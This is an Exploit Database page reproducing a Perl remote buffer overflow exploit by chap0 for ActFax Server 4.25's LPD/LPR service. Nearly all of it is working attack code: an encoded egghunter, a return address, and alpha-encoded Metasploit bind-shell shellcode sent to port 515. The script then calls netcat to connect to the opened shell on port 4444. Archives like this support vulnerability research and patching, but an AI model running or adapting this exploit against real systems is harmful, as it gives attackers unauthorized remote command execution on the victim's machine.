ActFax Server (LPD/LPR) 4.25 Build 0221 (2010-02-11) – Remote Buffer Overflow

• Exploit Database
• 14 阅读

• 作者： chap0
  日期： 2011-02-16
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/16176/

• #!/usr/bin/perl
  # Exploit Title: ActFax Server (LPD/LPR) Remote Buffer Overflow Exploit
  # Date: Feb 15, 2011
  # Author: chap0
  # Software Link: http://www.actfax.com/download/actfax_setup_en.exe
  # Version: Version 4.25, Build 0221 (2010-02-11)
  # Tested on: Windows XP SP3 en
  # Big thanks to Sud0 - and an extra greetz to mr_me -RESPECT
  # Stay true my friends
  
  print "\nActFax Server LPD/LPR Remote Buffer Overflow\n";
  print " chap0 - www.seek-truth.net \n\n";
  
  use IO::Socket;
  
  print "Target Address Please: ";
  chomp($target = <STDIN>);
   
  my $sock = IO::Socket::INET->new(PeerAddr => $target, PeerPort => '515', Proto => 'tcp');
  
  print "Connecting. . .\n";
  
  # egghunter EDI encoded
  my $eggedi="WYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIrFOqZjyo4O1RPRrJwrShXMvNuluUBzBTJOoH2Wtpp0PtLKxzlorUYzlo2UHgKOKWA";
  
  
  # ./msfpayload windows/shell_bind_tcp LPORT=4444
  # alpha2 encoded aligned with edi
  my $shellcode="WYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLyxniWpwpWpSPk9yuVQJr2DLKsb4pLKP".
  "RvllKPR4TnksB18VoNWaZvFvQyotqKpnLwLSQSLuRVL5p9QZo4MS1kwKRJPQB67NkrrtPlKBb5l5Qn0NkcpQhK5kpt4BjWqXPPP".
  "LKsxdXlKpX7Ps1jsjC5lg9lKdtlKS1N6uaKOvQyPllo1hOTM5QYWEhKPQel46c3M8x7KSMetpuKRpXlKshQ4GqkccVLK6lPKLK0".
  "XUL7qN3lKGtlK31jpLIpDEtUt1KSkCQPY0ZpQKOypshaO2zLKTRJKNf1MQx7CWBUPwpaxt7rSebaOSdphpLPwDfUWkOXUx8npwq".
  "uPWp7Yo4cdPPrH5ymPbKWpKOJupPrpbp2p70pPcppPaxxjvoyOKPYoYEmYO7VQkkpSphUReP4QqLoyxf1zFpPVsgcXkrIKVWPgK".
  "O8Uccv7rHMgYydx9o9oJubsrs2wbHD4Xl7Km1KOXU67OyZgU81eRN2mU1KOJuRHpcpmU4GpOykS2wv7qGdqHvsZgbV9SfIrKMqv".
  "jgW4TdWLEQUQLMstWTvpo6ePw42tpPrvqF1FG6PVrnSfV6pS2vsXqizlUoovkOHUmYkPpNRvQVIotpph7xmWwmSPKON5oKJPH5M".
  "rSfu8LfmEMmmMKOiEgL363LgzMPkKkPsEWumk0G230rporJEPPSKOHUgzA";
  
  
  my $payload1 = "A" . $eggedi . "\x7D" x (256-length($eggedi));
  my $addy = "\x7D\x4B\x4A\x00" ;# --> pop EDI/ pop ESI/ pop EBP/ pop EBX/ pop ECX/ retn
  my $payload2 = "w00tw00t" . $shellcode;
  
  my $payloads = $payload1.$addy.$payload2;
  
  print $sock $payloads;
  
   
  print "DONE shell in a moment. . .\n";
  
  $connect = "nc -vvn $target 4444";
  
  system $connect